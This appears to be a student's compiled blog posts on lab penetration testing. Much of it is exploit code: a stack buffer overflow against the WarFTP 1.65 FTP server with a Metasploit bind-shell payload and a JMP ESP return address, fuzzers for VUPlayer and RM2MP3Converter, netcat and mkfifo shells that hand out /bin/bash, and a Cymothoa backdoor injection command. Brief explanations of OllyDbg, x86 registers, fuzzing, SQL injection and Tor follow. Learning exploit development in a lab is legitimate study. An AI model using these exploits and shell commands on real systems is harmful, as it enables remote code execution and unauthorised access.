   "\x5a\xf1\xf4\x39\xa8\xe0\x09\x82\x7e\x04\x27\xab\xf7\x1f\xae\xd2"
   "\xe5\xe8\x2d\x81\x9f\xea\xce\xf9\x08\x32\x39\x0c\x65\x93\xc5\x38"
   "\x25\x4f\x69\x97\x99\x2c\xde\x54\x4d\x4c\x30\x3c\x19\xa3\xed\xa6"
   "\x8a\x4a\xec\xb3\x45\xe9\xf5\xcb\x52\xa6\xf6\xfd\x37\x59\x58\x54"
   "\x37\x89\x32\xf2\x6a\x04\x2a\xad\x8b\x8f\xff\x04\x8b\xe0\x68\x43"
   "\x3a\x87\x20\xdc\x42\x51\xe2\xb6\xe8\x0b\xfc\xe6\x82\xdc\xe5\x7f"
   "\x63\x65\xbd\x80\xbd\xc3\xbe\xae\x24\x86\x24\x28\xc1\x35\xc8\x3d"
   "\xf4\xd0\x42\x64\xde\xe8\xea\x71\x4a\xb5\x65\x9f\xba\xf5\x85\xf5"
   "\x43\xb7\x44\xf7\xfe\x14\x04\x8a\x85\x5c\x81\x3f\xd2\xf5\xa7\xc1"
   "\x96\x10\xb7\x48\x9d\xe3\x91\xe9\x4a\x4e\x4f\x5c\x24\x04\x6e\x0f"
   "\x97\x8d\x21\x50\xc7\x46\x6f\x77\xed\x58\x3c\x78\x38\x0e\x3c\x79"
   "\xf2\x30\x12\x0e\xaa\x32\x10\xd4\x31\x34\xc1\x86\x46\x1a\x86\x58"
   "\x61\x79\x24\xf7\x6e\xa8\x34\x27")
   file=open(filename,'w')
   file.write(buffer)
   file.close()

• run VUPlayer not Ollydbg and load fuzzer
• run terminal on backtrack and connection, type :
  root@bt:~# telnet 192.168.56.101 4444

======GOOD LUCK========

exploit RM2MP3Converter

i will try to exploit RM2MP3Converter

A. Fuzzing
1. make fuzzer

#!usr/bin/python
filename="test.wvx"
buffer='http://'
buffer+="\x41" * 50000
file=open(filename,'w')
file.write(buffer)
print"created successfully.."
file.close()

Wicd Problem

When run wicd no error messages that can not be used to make wicd can not connect to internet

after a search on google may eventually tutorial
 
1. Open a terminal and type
# Dpkg-reconfigure wicd 

2. The next update Wicd
# Update-rc.d defaults wicd
 
3. If there is unprivileged user in BT, add the user to netdev group. 
# Usermod - groups netdev

Buffer Overflow with Metode Direct RET

Buffer Overflow Direct RET

A. Fuzzing
1. Make the simple fuzzer using python language
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

 2.    Run aplication WarFTP from Windows XP
chose menu Properties →・ Start Service
for try connect ftp using nc : 192.168.56.101 21
if connect a comment : root@bt:~# nc 192.168.56.101 21
220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.

 3.    Running fuzzer type: root@bt:~# python fuzz.py
if the aplication close for desktop so it working

B. Debugger
after this kind of situation now we use Ollydbg on WarFTP server aplication
 1.    running Ollydbg and open WarFTP then will we see error comment
 2.    to prevent error we erase file FtpDaemon.DAT
 3.    running aplication WarFTPserver make a user dummies way button User Security Properties
 4.    repeat process fuzzer and running aplication WarFTP, aplication normal running
 5.    Running WarFTP server true Ollydbg
 6.    after WarFTP running,now we running aplication fuzzer on backtrack

 C.    Metasploit Framework
1. Open terminal backtrack and type : root@bt:~# cd /pentest/exploits/framework/tools
2. to have data 1000, I type :root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000 > string_pattern.txt
show same string “€廣a0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B”€

 3.    put string pattern to the fuzzer aplication and edit
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
#buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

4.after finish editing  the next step is running the fuzzer on WarFTP server. We repeat to running warftp on Ollydbg and see the show register.

 5.    make the pattern offset
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 32714131
485
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb q4Aq5Aq
493

 6.    edit fuzzer
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x90"*485
buffer="\xEF\xBE\xAD\xDE"
buffer+="\x90"*(493-len(buffer))
buffer+="\xCC"*(1000-len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

 7.    once more time the WarFTP server on Ollydbg and running fuzzer aplication, see value in EIP register

 8.    edit script fuzzer aplication

#!/usr/bin/pyton
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer= "\x90" * 485
buffer+= "\xD7\X30\x9D\x7C "
buffer+= "\xCC" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101', 21))
data = s.recv(1024)
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS PASSWORD' +'\r\n')
s.close()

 9.    now run WarFTP true Ollydbg and run fuzzer aplication

 D.   JMP ESP
1.     running aplication using Ollydbg. On the view menu chose sub menu Executable modules

 2.    Ollydbg will show new window  the name executable modules which is inside library WarFTP server when running.

 3.    Chose file shell32.dll for we out to the EIP register

 4.    double click shell32.dll than Ollydbg with show new window CPU

 5.    search  JMP ESP inside of shell32.dll, right click mean window ->Search for →・ Command

 6.    Insert JMP ESP to window find command and press Find button

 7.    Ollydbg found an address insede of JMP ESP on memory shell32.dll file
=7C9D30D7 FFE4 JMP ESP

 8.    After found JMP ESP address in to aplication memory next step to change value EIP, editing script fuzzer :
#!/usr/bin/pyton
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer= "\x90" * 485
buffer+= "\xD7\X30\x9D\x7C "
buffer+= "\xCC" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101', 21))
data = s.recv(1024)
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS PASSWORD' +'\r\n')
s.close()

 9.    now running the WarFTP on Ollydbg and running fuzzer aplication have edit. If all smoothly than pointer WarFTP server to buffer on memory.

E. Payload
1. make payload with msfweb

- open terminal and type :
root@bt:~# cd /pentest/exploits/framework2/
root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

127.0.0.1:55555

- open browser the show msfweb

- chose the payload button and filter modules to os::win32

- chose Windows Bind Shell and input :
DATA : process
PORT : 4444
Restricted Character : 0x00 0x0a 0x0d
Select Encoder : Msf::Encoder::ShikataGaNai

- press Generate Payload

- input payload code into fuzzer aplication and edit :
#!/usr/bin/pyton
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer= "\x90" * 485
buffer+= "\x90" * 32
buffer+="\xda\xc0\xbf\x32\xa5\x05\xfa\x33\xc9\xb1\x15\xd9\x74\x24\xf4\x5b"
buffer+="\x31\x7b\x17\x03\x7b\x17\x83\xd9\x59\xe7\x0f\x77\xc3\xb0\x76\xd5"
buffer+="\x6b\x51\x8b\xc8\x37\xd8\x6a\xb8\x85\x88\x2e\x6e\x60\x3d\x62\x0e"
buffer+="\xed\xae\x2d\x5d\x5c\xbb\xa5\x39\xad\xbb\x86\xd3\xe0\x3c\xb4\x70"
buffer+="\xa9\x8c\x27\xbb\xcd\x7a\x3d\x41\x97\xee\x98\x1d\x76\xb8\x4d\x50"
buffer+="\xf8\x0f\x17\x9f\xa9\xe7\xc8\x70\x39\x90\x7e\xa1\xdf\x09\x11\x34"
buffer+="\xfc\x9a\xb9\x15\x50\xab\x79\x54\xd6"
s.connect(('192.168.56.101', 21))
data = s.recv(1024)
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS PASSWORD' +'\r\n')
s.close()

- run the payload with WarFTP without Ollydbg from Windows XP system and running aplication fuzzer from backtrack terminal

- running telnet to connecting between windows XP with backtrack true 4444 PORT
rroot@bt:~# telnet 192.168.56.101 4444
Trying 192.168.56.101...
telnet: Unable to connect to remote host: Connection refused

i haven't success to connect with telnet so i will try harder to connect

OLLY DBG

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries. Version 1.10 is the final 1.x release.
Version 2.0 has recently been released, and OllyDbg has been rewritten from the ground up in this release. The software is free of cost, but the shareware license requires users to register with the author. The current version of OllyDbg cannot always disassemble binaries compiled for 64-bit processors, though a 64-bit version of the debugger has been promised.
OllyDbg is often used for reverse engineering of programs. It is often used by crackers to crack software made by other developers. For cracking and reverse engineering, it is often the primary tool because of its ease of use and availability. It is also useful for programmers to ensure that their program is running as intended.

INSTALL OLYY DBG IN WINDOWS XP

the step:

1. download olly dbg
2. extract the file
3. open extract folder olly dbg ang run the ollydbg.exe

Memory Register

Register a partial memory of the microprocessor which can be accessed with a very high speed. In doing his job microprocessor registers are always used as the intermediary, so the register can be likened to the feet and hands microprocessor.

An Intel x86-based CPU uses 8 registers as general purpose, namely: EAX, EDX, ECX, ESI, EDI, EBP, ESP and EBX.

EAX register, used to perform calculations and store the value returned from a function call (function calls). Basic operations such as add, subtract, and compare the optimized use of register EAX. Special operations such as multiplication and division are also only in the EAX register.

Data Register is a register EDX. Basically an extension of EAX to (help) save additional data for complex operations. It can also be used for general purpose data storage.

ECX registers, also called the count register is used for loop operations. Loop operation can save the string, or counting numbers.

ESI and EDI registers relied upon by the loop that processes the data. Register ESI is the index of the source (S in the ESI means the Source, which means the source) to the operating data and holds the location of input data
streams. EDI register points to the location where the operation data is stored, or index of the destination (Destination D on EDI means that meaningful purpose).


ESP is the stack pointer register, and register EBP is the base pointer. These registers are used to set the function calls and stack operations. When this function is called, the function arguments will
pushed onto the stack and followed by the address of the sender (return address). ESP points to the top of the stack, so it will point to the address of the sender (return address). While EBP is used to refer to the call stack at the bottom.

Register EBX is the only register that is not designed for anything special. But is used for extra storage.

EIP register is a register that points to the instruction currently being executed. When the CPU is engaged in the binary, the address is always updated EIP to determine the location where the execution occurred.

Fuzzing

Fuzzing or fuzz testing is a software testing technique used to test for security problems in software or computer systems. The program often automated or semi-automated, that involves providing invalid, unexpected, or random data to the inputs of a computer program.

using netcat in ubuntu

the first step
in ubuntu input
#nc -l -p 1234 -e /bin/bash

in backtrack input
:nc 192.168.56.101 1234
*copyng nc to ubuntu

:cp /bin/nc.1 /var/www

Dump DVWA with sqlmap

Dump DVWA with sqlmap
1.active your apche and mysql in backtrack aplication
2.open your browser n type localhost/dvwa

change DWVA security

and input a variable. and look the tamper data.

Bypass from FBIP

1.  i type localhost/fbpi to browse page
2. then i go trough to from login




3. finally i go trough to the web without password and username / bypass

Editing Cymothoa

1.On bactrack console type :
#nc -l -v -p  11610 -e > cy /bin/bash
listening on [any] 11610 ...
192.168.56.1 inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 55767

2. Generate backdoor using cymothoa in backtrack
comment : ./cymothoa -p 1844 -s 0 11

Netcat mk fifo

1. I use the filename is newbiefile than type is comment : mkfifo newbiefile
than type is comment : nc -lk 1234 < newbiefile | /bin/bash >newbiefile


2. Run from the server this existing the comment : nc 192.168.56.1 1234

advance information gathering

http://www.4shared.com/file/i-bBLRYO/detikscan.html

The different betwen sql injection and blind sql

An SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. SQL injection is a code injection technique that exploits a security vulnerability in a website's software.

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

TOR (The Onion router)

Tor (short for The onion router) is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers in order to conceal a user's location or usage from anyone conducting network surveillance or traffic analys. Using Tor makes it more difficult to trace Internet activity, including "visits to Web sites, online posts, instant messages and other communication forms", back to the user] and is intended to protect users' personal freedom, privacy, and ability to conduct confidential business by keeping their internet activities from being monitored.

"Onion routing" refers to the layered nature of the encryption service: The original data are encrypted and re-encrypted multiple times, then sent through successive Tor relays, each one of which decrypts a "layer" of encryption before passing the data on to the next relay and, ultimately, its destination. This reduces the possibility of the original data being unscrambled or understood in transit.